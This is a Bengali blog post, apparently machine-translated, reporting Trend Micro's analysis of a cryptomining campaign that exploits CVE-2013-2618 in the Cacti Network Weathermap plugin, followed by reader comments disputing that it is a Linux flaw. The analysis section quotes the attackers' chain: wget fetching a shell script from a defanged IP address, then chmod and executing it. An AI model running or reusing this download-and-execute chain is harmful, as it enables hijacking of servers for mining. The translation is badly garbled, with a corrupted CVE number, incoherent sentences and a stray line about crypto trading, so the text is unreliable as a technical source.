5-বছরের লিনাক্স ত্রুটি আক্রমণকারীদের ক্রিপ্টোকারেন্সি খনির অনুমতি দেয়

লিনাক্স ক্র্যাশ

এই থেকে ক্রিপ্টোকারেন্সি খনি দূরবর্তী কম্পিউটার ব্যবহারের সাথে অনুমোদন ছাড়াই এর মালিকদের একটি ট্রেন্ড হয়ে উঠছে। এই ধরণের পরিস্থিতি সম্পর্কে আমি ইতিমধ্যে এখানে কয়েকবার ব্লগে এই বিষয়ে কথা বলেছি।

এবং এটি হ'ল এই মুহূর্ত থেকে ক্রিপ্টোকারেন্সিগুলি পুরোপুরি নিয়ন্ত্রণের বাইরে চলে গেছে বেশ যথেষ্ট জায়গা এবং মান নিয়েছে, সুরক্ষা লঙ্ঘনকারী কম্পিউটারগুলিতে অ্যাক্সেসের জন্য পর্যাপ্ত জ্ঞানযুক্ত লোকেরা আর্থিক সুবিধা পেতে গুরুত্বপূর্ণ তথ্য বা ব্যাংক অ্যাকাউন্টগুলির সন্ধানে সময় নষ্ট করে ফেলেছে।

এটি করার পরিবর্তে, তারা সবচেয়ে সহজ কাজটি করার বিকল্প বেছে নেয়: এই দলগুলির নিয়ন্ত্রণ গ্রহণ করুন এবং একটি খনির নেটওয়ার্কে তাদের একত্রিত করুন এবং অন্যান্য কাজের জন্য যা তারা সাধারণত বোটনেটের সাহায্যে করেন।

এইভাবে সাধারণত আপনাকে নতুন করে ভাড়া দেওয়া আরও বেশি হয়, তারা কেবল এটির ফলে তৈরি হওয়া তাত্ক্ষণিক অর্থের দিকে মনোনিবেশ করছে।

বাজারের প্রবণতাগুলির স্মার্ট বুদ্ধি এবং ক্রিপ্টো ট্রেডিংয়ের সঠিক জ্ঞানের সাথে, কেউ দুর্দান্ত সুবিধা অর্জন করতে পারে।

লিনাক্স আসলেই কি নিরাপদ ব্যবস্থা?

আমাদের অনেকের ধারণা, লিনাক্স একটি প্রায় নিখুঁত সুরক্ষিত অপারেটিং সিস্টেম, বাস্তবতা হ'ল এর এখনও কিছু ত্রুটি রয়েছে।

ভাল আছেকিছু দিন ট্রেন্ডমাইক্রো একটি অনুসন্ধান করেছে, যা প্রকাশিত একটি নতুন লিনাক্স সিস্টেমে ত্রুটি যা হ্যাকারগুলিকে মাইনিং ক্রিপ্টোকারেন্সির সুবিধা দেয় লিনাক্স সার্ভার এবং মেশিন ব্যবহার করে।

আপনার ব্লগের মাধ্যমে একটি বিবৃতিতে তারা নিম্নলিখিত মন্তব্য:

ঘটনার প্রতিক্রিয়া সম্পর্কিত আমাদের পর্যবেক্ষণের মাধ্যমে আমরা অনুপ্রবেশের প্রচেষ্টা পর্যবেক্ষণ করেছি যার সূচকগুলি আমরা জেনকিনসমিনার ম্যালওয়ার ব্যবহার করে এমন একটি পূর্ববর্তী ক্রিপ্টোকারেন্সি খনির প্রচারণার সাথে সম্পর্ক রাখতে সক্ষম হয়েছি।

পার্থক্য: এই প্রচারটি লিনাক্স সার্ভারগুলিকে লক্ষ্য করে। এটি পুরানো সুরক্ষার ত্রুটিটি ব্যবহার করে, যার প্যাচটি প্রায় পাঁচ বছর ধরে উপলব্ধ।

আপনার বিশ্লেষণের মাধ্যমে এই প্রকাশে In ক্ষতিগ্রস্থ সাইটগুলি সনাক্ত করতে পরিচালিত এই ব্যর্থতার জন্য এটি মূলত জাপান, তাইওয়ান, চীন, মার্কিন যুক্তরাষ্ট্র এবং ভারতকে প্রভাবিত করে।

আক্রমণ বিশ্লেষণ

বিশ্লেষণের মাধ্যমে ট্রেন্ড মাইক্রো স্মার্ট প্রোটেকশন নেটওয়ার্ক দ্বারা আক্রমণকারীরা কীভাবে এই ত্রুটিটি কাজে লাগায় সে সম্পর্কে কিছু বিশদ:

এই প্রচারের অপারেটররা সিভিই-২০১৩-২ explo১৮, ক্যামাপি নেটওয়ার্ক ওয়েদারম্যাপ প্লাগইনের একটি নির্ধারিত দুর্বলতা ব্যবহার করে যা সিস্টেম প্রশাসকরা নেটওয়ার্ক ক্রিয়াকলাপটি কল্পনা করতে ব্যবহার করে।

তারা কেন পুরনো সুরক্ষা ত্রুটিটি কাজে লাগাচ্ছে: নেটওয়ার্ক ওয়েদারম্যাপে জুনে ২০১৪ সাল পর্যন্ত দু'টি প্রকাশ্যে দুর্বলতা প্রকাশিত হয়েছে।

এই আক্রমণকারীরা কেবল কোনও সুরক্ষা ত্রুটি নয়, যার জন্য কোনও শোষণ উপলভ্য রয়েছে সেগুলিই গ্রহণ করতে পারে তবে ওপেন সোর্স সরঞ্জামটি ব্যবহার করে সংস্থাগুলিতে যে প্যাচ বিলম্ব হয় তাও গ্রহণ করতে পারে।

মূলত আক্রমণটি একটি এক্সএসএস আক্রমণের মাধ্যমে:

ওয়েদারম্যাপ-ক্রিপ্টোমিনিয়ার -4

অস্পষ্ট অংশটি হ'ল আক্রমণ লক্ষ্য, একটি পোর্ট সহ একটি ওয়েব সার্ভার।

ফাইলটি /plugins/weathermap/configs/conn.php ক্রমাগত এক্সএসএস আক্রমণ থেকে প্রাপ্ত ফাইলটি / প্লাগইনস / ওয়েদারম্যাপ / পিএইচপি .

ছাড়াও conn.php প্রাথমিকভাবে, আমরা দেখতে পাই একটি অনুরূপ HTTP অনুরোধ 'নামক পৃষ্ঠায় প্রয়োগ করা হয়েছে cools.php '.

ক্রিপ্টোকারেন্সি খনির প্রোগ্রাম দুর্বলতার মাধ্যমে বিতরণ করা হয় পিএইচপি আবহাওয়ার মানচিত্র থেকে লক্ষ্যগুলি যেগুলি লিনাক্স সার্ভার

চিত্রটিতে আপনি কীভাবে আক্রমণটি উত্পন্ন হয় তা দেখতে পাবেন এবং এটি নীচে বর্ণিত হয়েছে:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

এটি যা করে তা হ'ল উইজেটযুক্ত একটি ফাইল ডাউনলোড করার ইঙ্গিতটি প্রেরণ যা একটি ইউটিলিটি যা প্রায় সমস্ত লিনাক্স ডিস্ট্রিবিউশন ডিফল্টরূপে ইনস্টল করা আছে

chmod 775 watchd0g.sh

ফাইল এক্সিকিউটেবল করে তোলে

./watchd0g.sh

এটি শেষ পর্যন্ত যা করে তা হ'ল সার্ভারে চালিত হওয়ার জন্য ফাইলটি।

সৌভাগ্যবসত, ইতিমধ্যে একটি প্যাচ আছে ( জন্য CVE-2013-2618 ) ব্যর্থতার জন্য উপলব্ধ এবং আপনি এটি ডাউনলোড করতে পারেন থেকে এই লিঙ্কটি

Si আপনি এটি সম্পর্কে আরও জানতে চান এই ব্যর্থতার আপনি এই লিঙ্কটি দেখতে পারেন।

উৎস: ক্রিপ্টোকারেন্সি মাইনার পিএইচপি ওয়েদারম্যাপ ভীনরেবিলিটির মাধ্যমে বিতরণ করা হয়েছে, লিনাক্স সার্ভারকে লক্ষ্য করে


আপনার মন্তব্য দিন

আপনার ইমেল ঠিকানা প্রকাশিত হবে না। প্রয়োজনীয় ক্ষেত্রগুলি দিয়ে চিহ্নিত করা *

*

*

  1. ডেটার জন্য দায়বদ্ধ: মিগুয়েল অ্যাঞ্জেল গাটান
  2. ডেটার উদ্দেশ্য: নিয়ন্ত্রণ স্প্যাম, মন্তব্য পরিচালনা।
  3. আইনীকরণ: আপনার সম্মতি
  4. তথ্য যোগাযোগ: ডেটা আইনি বাধ্যবাধকতা ব্যতীত তৃতীয় পক্ষের কাছে জানানো হবে না।
  5. ডেটা স্টোরেজ: ওসেন্টাস নেটওয়ার্কস (ইইউ) দ্বারা হোস্ট করা ডেটাবেস
  6. অধিকার: যে কোনও সময় আপনি আপনার তথ্য সীমাবদ্ধ করতে, পুনরুদ্ধার করতে এবং মুছতে পারেন।

  1.   মিগুয়েল মায়োল আমি তুর তিনি বলেন

    বোকা হওয়া নিরাপদ নয় এবং এর পরেও লিনাক্স আপনাকে বাঁচায়।
    সুরক্ষা প্যাচগুলি আপডেট না করা লিনাক্সের দোষ নয়। এটি দোষ যে কিছু সংস্থা অর্থ সাশ্রয়ের জন্য ইডিয়টকে সিস্টেম প্রশাসক হিসাবে ভাড়া দেয়,
    তবে তা সত্ত্বেও, এটি তাত্ক্ষণিকভাবে সনাক্ত করা হয় এবং এখনই সমাধান করা হয়, এমনকি এর মতো কোনও ছোটখাটো সুরক্ষা ঘটনাও প্রকাশিত হয়।

  2.   আমি লেডিকোলেটাসের মতো ভিলা চাই তিনি বলেন

    এবং লিনাক্সের কী আপডেট আছে যে এর আপডেটগুলি প্রয়োগ করা হয়নি? জিএনইউ / লিনাক্স বিকাশকারীরা উদীয়মান দুর্বলতার সমাধান বিকাশ করে এবং তাদের ব্যবহারকারীর জন্য উপলব্ধ করে তাদের কাজটি করে। যদি ডাক্তার কোনও ফ্লু ভ্যাকসিন নির্ধারণ করে এবং আপনি এটি না পান তবে আপনি অসুস্থ এবং কড়া হয়ে যান ... এটি কি ডাক্তারের দোষ?

  3.   বিল তিনি বলেন

    DesdeLinux এটি যা ছিল তা নয়, দুটি গুরুত্বপূর্ণ ত্রুটি সহ পরপর দুটি সংবাদ:
    1.- উন্নততর সম্পাদকগণের বিকাশের জন্য তারা এমন একটি রাখেন যা নিখরচায় সফ্টওয়্যার নয় এবং তারা অন্যকে ভুলে যায় (তাদের মন্তব্যে উদ্ধৃত করা হয়)।
    ২- ভাইরাসগুলি সম্পর্কে তীব্র সংবাদ যখন তারা কেবল নন আপলোডেড সার্ভারগুলিকেই প্রভাবিত করে। কিন্তু যদি কোনও লিনাক্স কয়েক দশক ধরে ডিফল্টরূপে আপডেট করা থাকে। ভয় তৈরির জন্য যেমন একটি উইন্ডোজ-স্টাইল চুষছে অ্যান্টিভাইরাস প্রয়োজন। তারা মনে করে চেষ্টা করার চেষ্টা করছে যে লিনাক্স উইন্ডোজের মতো এবং একই রকম নয়।
    যদি কোনও বাগ পুরানো হয় এবং ইতিমধ্যে প্যাচ করা থাকে তবে এটি কোনও সংবাদ নয় বা কিছুই নয়। মাইক্রোসফ্ট এবং অ্যান্টিভাইরাস সংস্থাগুলি যেমন ট্রেন্ড মাইক্রো, নরটন, পান্ডা বা ম্যাকাফি খেলবেন না বা বেতন পান না।
    যাইহোক, আমরা সংস্থায় বেশ কয়েক বছর ধরে ট্রেন্ড মাইক্রো ব্যবহার করছিলাম এবং এটি ছিল একটি সত্য আলু, ছিঁচকার, কারণ এর সিস্টেম বলেছে যে একটি এক্সিকিউটেবলের ভাইরাসের "চিহ্ন" ছিল (এমন কিছু যা ভাইরাস হতে পারে, এমনকি যদি না) এবং কেন এটি এটি অপসারণ করেছে (এটি এটি একটি ডিরেক্টরিতে নিয়ে গেছে যাতে এটি চলবে না) এটির ব্যবহারের অনুমতি না দেয় এবং আমাদের ব্যবহার করা দরকার এমন একটি নিরাপদ এক্সিকিউটেবল ফাইলের সাথে এই আচরণটি অবরোধ মুক্ত করার জন্য এটির কোনও সাদা তালিকা নেই didn't । ছি ছি এটি কর্পোরেট সংস্করণ ছিল, পৃথক সংস্করণে এই শ্বেত তালিকাটির সম্ভাবনা রয়েছে। করুণ।

  4.   বিল তিনি বলেন

    নিজেকে এত মার্জিতভাবে বর্ণনা করবেন না।
    নিবন্ধটি এমন একটি সুরক্ষা গর্ত সম্পর্কে কথা বলেছে যা আপনাকে কোনও প্রোগ্রামে প্রবেশ করতে, এটি কার্যকর করতে এবং এটি চালানোর অনুমতি দেয়, যা প্রতিটি ভাইরাসটি ছড়িয়ে দেওয়ার দরকার হয় এমন সুরক্ষা গর্ত, স্পষ্টতই এটির ভাইরাস হওয়ার জন্য অবশ্যই প্রোগ্রামটির কোডটিতে প্রবেশের সম্ভাবনা থাকতে হবে would অপারেশন এবং স্ব-অনুলিপি পুনরাবৃত্তি করতে নেটওয়ার্কে কম্পিউটার স্ক্যান করুন। তারা ঠিক এটি করে না কারণ লিনাক্সে আবিষ্কৃত সুরক্ষা গর্তগুলি একটি সুরক্ষা প্যাচ দ্বারা আচ্ছাদিত হয়, এবং এটি আমি উইন্ডোজ এবং লিনাক্সের মধ্যে পার্থক্য বলতে চাই, যেহেতু কোনও অ্যান্টিভাইরাস প্রয়োজনীয় নয়, তবে গর্তটি আবরণ করার জন্য। উইন্ডোজে এটি বেশ কয়েকটি কারণে আরও বেশি কঠিন: ১- আক্রান্ত কম্পিউটারে তাদের পরিচিতির জন্য একটি পদক্ষেপ মুছে ফেলার ফলে ফাইলগুলি কেবল তাদের সম্প্রসারণের কারণে কার্যকর করা যায়। ২. ব্যবহারকারীরা ক্রমাগত সন্দেহজনক উত্সের প্রোগ্রাম ইনস্টল করে চলেছেন কারণ তারা মালিকানাধীন এবং অর্থ প্রদান ছাড়াই তাদের থাকা দরকার (কম্পিউটারের সরঞ্জামের দাম দ্বিগুণ করার চেয়ে বাড়ির অর্থনীতিতে এমএস অফিস, ফটোশপ কেনা কী হবে তা আমি কিছুই বলছি না)। ৩. - শীঘ্রই বা উইন্ডোজ ঝাঁকুনিতে পড়বে, ব্যবহারকারী এটি প্রতিবেশী, বন্ধু, এর কাছে নিয়ে যায় ... যিনি সমস্ত কিছু বিন্যাস না করার জন্য চূড়ান্ত উইন্ডোজ ইনস্টল করে একটি অ্যাক্টিভেশন প্যাচ যা আপডেট হয় না বা প্যাচটি নিজেই রাখে গুপ্তচর প্রোগ্রাম। এটি হতে পারে এটি না এবং এটি দুর্দান্ত but তবে এটি হতে পারে এবং আপনার পাসওয়ার্ডগুলির জন্য উইন্ডোজ গুপ্তচরবৃত্তি করেছে। নিবন্ধে তারা দুর্বলতার দ্বারা প্রভাবিত একটি লিনাক্সে প্রবর্তন সিস্টেমের কথা উল্লেখ করেছে, প্রোগ্রামটি তৈরি করে যা স্বয়ংক্রিয়ভাবে নেটওয়ার্কটি স্ক্যান করে এবং এটি অনুলিপি করতে এবং সার্ভারে চালানোর জন্য ব্যবহার করে সবার মধ্যে সহজতম অংশ, সেই কারণেই মন্তব্য করা হয়েছে নিবন্ধে যে কোনও ভাইরাসের জন্য সর্বাধিক গুরুত্বপূর্ণ পদক্ষেপ: আক্রমণ করার সিস্টেমটির দুর্বলতা জেনে।

  5.   হামবাগলিও তিনি বলেন

    খারাপ তথ্য। এটি লিনাক্সে কোনও বাগ নয়, এটি একটি পিএইচপি অ্যাপ্লিকেশনটির একটি বাগ, অর্থাৎ এটি মাল্টিপ্ল্যাটফর্ম। এটি লিনাক্স কার্নেল চালিত সিস্টেমে একচেটিয়াও নয়! তবে অ্যাপ্লিকেশনটি যদি ক্রস প্ল্যাটফর্ম না হয় তবে এটি লিনাক্স বাগ নাও হবে, এটি কেবল একটি অ্যাপ্লিকেশন হবে।

    লিনাক্স কার্নেলের এই জাতীয় ক্রস-সাইট স্ক্রিপ্টিং আক্রমণ থেকে রক্ষা করতে সামান্যতম হস্তক্ষেপ নেই। কমপক্ষে পোস্ট করার আগে পাঁচ মিনিট তদন্ত করুন কারণ সত্য যে যে কেউ যে কেউ সম্পর্কে কিছুটা কম জানেন, আপনি খারাপ দেখতে যাচ্ছেন।